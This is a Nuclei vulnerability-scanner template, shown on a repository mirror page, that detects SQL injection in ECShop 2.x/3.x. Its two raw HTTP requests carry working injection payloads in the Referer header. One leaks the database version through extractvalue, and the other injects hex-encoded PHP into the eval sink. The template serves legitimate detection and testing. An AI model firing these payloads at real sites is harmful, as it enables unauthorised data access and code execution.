daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/other/ecshop-sqli.yaml

46 lines
2.1 KiB
YAML
Raw Permalink Blame History

id: ecshop-sqli
info:
name: ECShop 2.x/3.x - SQL Injection
author: Lark-lab,ImNightmaree,ritikchaddha
severity: critical
description: |
ECShop 2.x and 3.x contains a SQL injection vulnerability which can allow an attacker to inject arbitrary SQL statements via the referer header field and the dangerous eval function, thus possibly allowing an attacker to obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://titanwolf.org/Network/Articles/Article?AID=af15bee8-7afc-4bb2-9761-a7d61210b01a
- https://phishingkittracker.blogspot.com/2019/08/userphp-ecshop-sql-injection-2017.html
- http://www.wins21.com/mobile/blog/blog_view.html?num=1172
- https://www.shutingrz.com/post/ad_hack-ec_exploit/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cwe-id: CWE-89
metadata:
verified: true
max-request: 2
fofa-query: app="ECShop"
tags: sqli,php,ecshop
http:
- raw:
- |
GET /user.php?act=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;}
- |
GET /user.php?act=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:107:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b706870696e666f0928293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
stop-at-first-match: true
matchers:
- type: word
words:
- '[error] =>'
- '[0] => Array'
- 'MySQL server error report:Array'
condition: and
# digest: 4a0a0047304502203ae49378f799b9273219736013b01e956378963294f2c290ca0d9d8f96bfb99f022100d1b025e172f2914639fd88715d7690b6537b8255540d0155162f31e0597eb1df:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink